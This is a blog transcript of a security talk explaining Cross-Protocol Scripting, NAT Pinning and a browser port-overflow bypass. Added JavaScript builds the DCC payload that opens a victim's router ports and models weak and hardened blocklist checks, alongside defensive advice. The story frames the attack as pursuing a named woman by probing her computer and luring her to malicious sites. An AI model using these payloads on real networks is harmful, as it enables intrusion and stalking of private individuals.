How to hack Facebook account 3: applying Cross-Protocol Scripting to attack victim’s network

Read: How to hack Facebook account: Facebook profile hacking by PHP session hijacking
Read: How to hack Facebook account 2: using LCG for Facebook profile hacking

Having hacked the targeted Facebook account, as outlined in the previous part of the talk, Samy Kamkar goes on to reach the victim's PC through her home router using Cross-Protocol Scripting and NAT Pinning.

Well, let’s talk about something that some of you may have heard recently called Cross-Protocol Scripting (XPS). Cool thing about this is HTTP servers can run on any port. This means the browser will allow you to communicate to other HTTP servers on any port. But HTTP is a newline-based protocol. What that means is each line has some data rather than some weird, let’s say, XML formatted data, or a binary string of some sort. But there are other protocols that are also newline-based. So what we can do is we can actually communicate with a different newline-based protocol, like IRC [1].

Sample IRC connection

IRC is a great place, it’s good people. So take a look at the image to see what an IRC connection looks like. I telnet to a reputable server like efnet.org, I log in – my username is Samy, I respond to a PING request, and then I join a channel, and I find out, you know, where can I get WinNuke [2]. Well, it doesn’t work anymore. So if anyone has a version that works, please send it to me.

Code embedded in Samy's malicious web page

Let’s see how we do an IRC client on the web. What’s interesting about this is I create a malicious page that has this code running on the page (see image). You visit my malicious web page. Now your client connects to the IRC server, your web browser thinks it’s an HTTP server. And what it does is it sends HTTP request with the postdata of my IRC data. And the IRC server says “Well, I don’t understand this HTTP request, I don’t understand this line, line, line. Oh, I understand this, I understand ‘join #hackers’, I know what that means, I’ll interpret that, and I’ll just ignore all your other stuff”.

At this point, I am making your IP address connect to the IRC server. Now, this can be used for SMTP [3] for example. Spammers have actually been using this for years and years, and it hasn’t been really well-known. They’ve been basically making people’s browsers become spam servers. You visit a page and, without you ever seeing, on the backend there is a form that’s connecting to an HTTP server on port 25 and auto-submitting that form, and basically you’re now sending Viagra spam. Why are you going to a Viagra site – I don’t know, but it’s what they have on the back.

Samy's sample HTTP post

So, you can see on the image what an HTTP post looks like. You see basically all the HTTP headers that your browser is sending, and then you see the IRC data. Again, the IRC server ignores the data it doesn’t understand, until it hits this data it understands. So I’m bringing this up.

Let me talk about something called NAT Pinning. So it’s like XPS [4] times 9000. So what is NAT Pinning? Well, here is the thing: your web browser was confused. It thought it was communicating with an HTTP server but it was communicating with an IRC server. Now NAT Pinning takes this one step further, and basically it makes the router also confused, so it thinks it’s communicating with a different protocol.

So now your router thinks it’s communicating with IRC, your browser thinks it’s communicating with HTTP, and they start doing different things. What can we do with this? Well, let’s analyze a malicious server. So you have your systems, your network devices behind your NAT. You have the malicious server that you’re going to hit a website, you’re hitting a web URL on that malicious server.

Now, if you’re familiar with IRC, there is something called the DCC. It’s basically how porn is sent over IRC, it’s great, it’s great protocol. Basically what a DCC is, it’s a direct client connection. So when you’re communicating with an IRC server, when you’re chatting with all the other really cool people, you say “You know what, I wanna send you this file, so connect directly to me, there is no point for the server bridging this file or this chat, so connect directly”.

The way that works is you send a message to that person and you say “Hey, I want you to connect back to me on this IP address, on this port.” Now, years ago, routers didn’t understand this message, it was just TCP traffic. And what would happen is if you didn’t have that port open or forwarded to yourself, then the connection would never establish. People complained, you know, it broke all sorts of things, it broke IRC, DCC, it broke FTP, it broke SIP. So routers got smart. They started developing software that would actually watch the traffic, look for messages like this: ‘PRIVMSG samy : DCC CHAT samy’. And if they saw that message, then they would say “Oh, a client on my network is trying to get a file sent, so I’ll port-forward that port back to them”.

Well, if you recall, they’re assuming that your valid client said “I wanna do this, I actually want this person to connect back to me.” But you visited my malicious website, and your browser sent this data. Well, what if I put that DCC message in the browser, in the JavaScript submit? Now you visit my website, the website submits that malicious form to just some random server and it says “I want you to connect to me on port 22 and port 80, and port 443, and 25, and 21, and 23”.

Malicious code for attacking the victim on all ports

I’ve now just port-forwarded every port I wanna attack you on, just by you visiting my website. That’s it. The browser has no idea what’s going on, it’s just filling out its request, and I am attacking you on every single port. Check out the code on the image.
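What follows is an added example, not Samy's code and not the code on the slides, covering both the XPS request above and the NAT Pinning form: it builds the bytes a browser sends when an HTML form is auto-submitted to an IRC port, then runs that request through two constructed parsers, a tolerant IRC server that only acts on lines it recognises, and a router-style IRC ALG that opens an inbound mapping for every DCC offer it sees. The server name, nicknames, channel, victim LAN address and the exact DCC grammar the ALG accepts are assumptions (real ALGs differ in what they accept); the victim's LAN address has to be known or guessed, as it would in the real attack.

```javascript
// Added example (not the talk's code): a cross-protocol POST on the wire and
// how two different newline-based parsers treat it. Runs offline in Node.
const VICTIM_LAN_IP = '192.168.1.10'; // constructed; would be guessed in practice

// Build the request a browser sends when a form with one text field is
// submitted to host:port. The browser adds the request line and headers;
// everything in the field ends up inside the multipart body, line by line.
function buildXpsRequest(host, port, ircLines) {
  const boundary = '----FormBoundaryXpsExample';
  const body = [
    `--${boundary}`,
    'Content-Disposition: form-data; name="q"',
    '',
    ...ircLines,
    `--${boundary}--`,
    '',
  ].join('\r\n');
  const headers = [
    'POST / HTTP/1.1',
    `Host: ${host}:${port}`,
    `Content-Type: multipart/form-data; boundary=${boundary}`,
    `Content-Length: ${Buffer.byteLength(body)}`,
    '',
    '',
  ].join('\r\n');
  return headers + body;
}

// Tolerant IRC server model: a line whose first word is a known command is
// acted on; anything else (HTTP headers, boundaries) is ignored.
const IRC_COMMANDS = new Set(['NICK', 'USER', 'PONG', 'JOIN', 'PRIVMSG', 'QUIT']);
function ircServerParse(raw) {
  const accepted = [];
  for (const line of raw.split('\r\n')) {
    const cmd = line.split(' ')[0].toUpperCase();
    if (IRC_COMMANDS.has(cmd)) accepted.push(line);
  }
  return accepted;
}

// Router IRC ALG model (the thing NAT Pinning abuses): scan outbound traffic
// for DCC offers and record an inbound mapping for each advertised ip:port.
// Assumed DCC shape: PRIVMSG <nick> :\x01DCC CHAT chat <ip-as-u32> <port>\x01
function routerAlgMappings(raw) {
  const mappings = [];
  const re = /^PRIVMSG \S+ :\x01?DCC (?:CHAT|SEND) \S+ (\d+) (\d+)\x01?$/;
  for (const line of raw.split('\r\n')) {
    const m = re.exec(line);
    if (!m) continue;
    const ip = [24, 16, 8, 0].map(s => (Number(m[1]) >>> s) & 255).join('.');
    mappings.push({ ip, port: Number(m[2]) });
  }
  return mappings;
}

// DCC carries the address as a 32-bit integer, not dotted quad.
function ipToU32(ip) {
  return ip.split('.').reduce((acc, octet) => acc * 256 + Number(octet), 0);
}

// The "attack you on every port" form body: one DCC offer per port.
function natPinningLines(victimIp, ports) {
  const u32 = ipToU32(victimIp);
  return [
    'NICK victim',
    'USER victim 0 * :victim',
    'JOIN #hackers',
    ...ports.map(p => `PRIVMSG samy :\x01DCC CHAT chat ${u32} ${p}\x01`),
  ];
}

const request = buildXpsRequest('irc.example.net', 6667,
  natPinningLines(VICTIM_LAN_IP, [21, 22, 23, 25, 80, 443]));
console.log(ircServerParse(request));     // only the IRC lines survive
console.log(routerAlgMappings(request));  // one mapping per offered port
```

Note that the request line and every header are just more lines the IRC server cannot parse, which is why the attack does not need the browser to send anything other than a normal form post; the only part the attacker controls is the field contents, and that is enough. A current browser will refuse to connect to port 6667 at all (see the port-blocking discussion below), so this block only constructs the bytes and never opens a socket.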

So this is really cool. Now, once the XPS stuff basically became big, the browsers start working on blocking certain ports. They say “You know what, you shouldn’t be communicating on port 6667. If you are running a web server on there – you’re stupid, choose a different port”. So they start blocking ports. So the port is 16 bits, that’s the size of a TCP or UDP port.

Now, if the browser says “You know, I am not gonna allow connection on port 6667. Does this port match 6667? No.” – just overflow it. So if you add another bit and you add 65536 to it, you get this bigger number, right, 72203. Your browser says that’s not 6667, this will go just fine, it gets sent to the TCP stack which then shortens it, and now you have 6667. I did not think of this, it was actually the respectable security group Goatse Security. They came up with this. Very good people. Very awesome, very awesome.
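The port-overflow bypass as an added example (not from the talk and not any browser's actual source): a blocklist check written the naive way, the 16-bit truncation the TCP stack applies, and a hardened check that validates the range first and compares the value that will actually go on the wire. The blocked-port set is a constructed subset, not a real browser's list.

```javascript
// Added example: weak port blocklist beside the corrected one.
const BLOCKED_PORTS = new Set([21, 22, 23, 25, 6667]); // constructed subset

// Vulnerable: compares the number the page supplied, so 65536 + 6667 = 72203
// is "not 6667" and sails through.
function isAllowedNaive(port) {
  return !BLOCKED_PORTS.has(port);
}

// What the socket layer actually uses: the low 16 bits of the value.
function wirePort(port) {
  return port & 0xffff;
}

// Hardened: reject anything that is not an integer in 1..65535 outright, so
// there is no value left for which the checked port and the wire port differ,
// then apply the blocklist to that value.
function isAllowedHardened(port) {
  if (!Number.isInteger(port) || port < 1 || port > 65535) return false;
  return !BLOCKED_PORTS.has(port);
}

// Run one candidate through both policies and report what the stack would dial.
function evaluatePort(port) {
  return {
    requested: port,
    naiveAllows: isAllowedNaive(port),
    hardenedAllows: isAllowedHardened(port),
    reaches: wirePort(port),
  };
}

for (const p of [6667, 72203, 8080]) console.log(evaluatePort(p));
```

The general fix is the same for any check that runs before a lossy conversion: validate the canonical form (here, the 16-bit port) and compare that, never the pre-conversion input.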

So at this point, Anna has clicked on my link. And now I have attacked her ports. So what did she have open? Well, a lot of OS X systems have a web server running by default. She was working on a website, so cute. So I connected back to her port 80, and saw she was making her own website about Team Jacob from ‘Twilight’. I love ‘Twilight’. Now I know how to get her. Here is the thing, I am actually on Team Edward, but I am not going to tell her that. So when I see her I’m gonna say I am on a Team Jacob.

So, how do you stop NAT Pinning? Well, there are so many ways that you wanna… well, you wanna have multiple layers. So you want a strict firewall, try to make it as strict as possible if you can. You know, if you don’t expect people using IRC on your network – block it off entirely. If you don’t expect people being able to send stuff – block it off; you can actually turn off UPnP [5] and other protocols that allow this type of thing to happen. Client-side, run up-to-date browsers. WebKit was vulnerable to the port overflow. I believe that is resolved now. Other browsers might still be vulnerable, I am not sure. Make sure you’re running up-to-date browsers. Use NoScript if you are using Firefox, that will block all types of things. When I released NAT Pinning, NoScript a day later added it to production. Run a local firewall if you can, like ‘Little Snitch’.

Samy's message to get Anna on another malicious website

I mean, really we all understand security is not just one level of security. You basically have to use multiple layers of protection, like I would with Anna. So at this point, I know what she is into, I know how to win her over, I think. So I am gonna send her a message to get her on another malicious website (see image), and basically say: “You know what, this guy Samy, he is a really good friend of mine, he is gonna come over and take care of you, check out his Twitter”.

Read: How to hack Facebook account 4: Geolocation via cross-site scripting


[1] IRC (Internet Relay Chat) is a protocol for real-time Internet text messaging (chat) or synchronous conferencing.

[2] WinNuke is a remote denial-of-service (DoS) attack against Windows 95, Windows NT and Windows 3.1x: out-of-band data sent to TCP port 139 (NetBIOS) crashed the target with a “blue screen of death”.

[3] SMTP (Simple Mail Transfer Protocol) is an Internet standard for electronic mail (e-mail) transmission across Internet Protocol (IP) networks.

[4] XPS (Cross-Protocol Scripting) is the technique described above: a browser is made to send an HTTP request to a server that speaks another newline-based protocol (IRC, SMTP, FTP), and that server discards the lines it does not understand and acts on the ones it does.

[5] UPnP (Universal Plug and Play) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points and mobile devices, to discover each other’s presence on the network and establish network services for data sharing, communications and entertainment; its port-mapping service lets a device on the LAN ask the gateway to forward an inbound port to it.
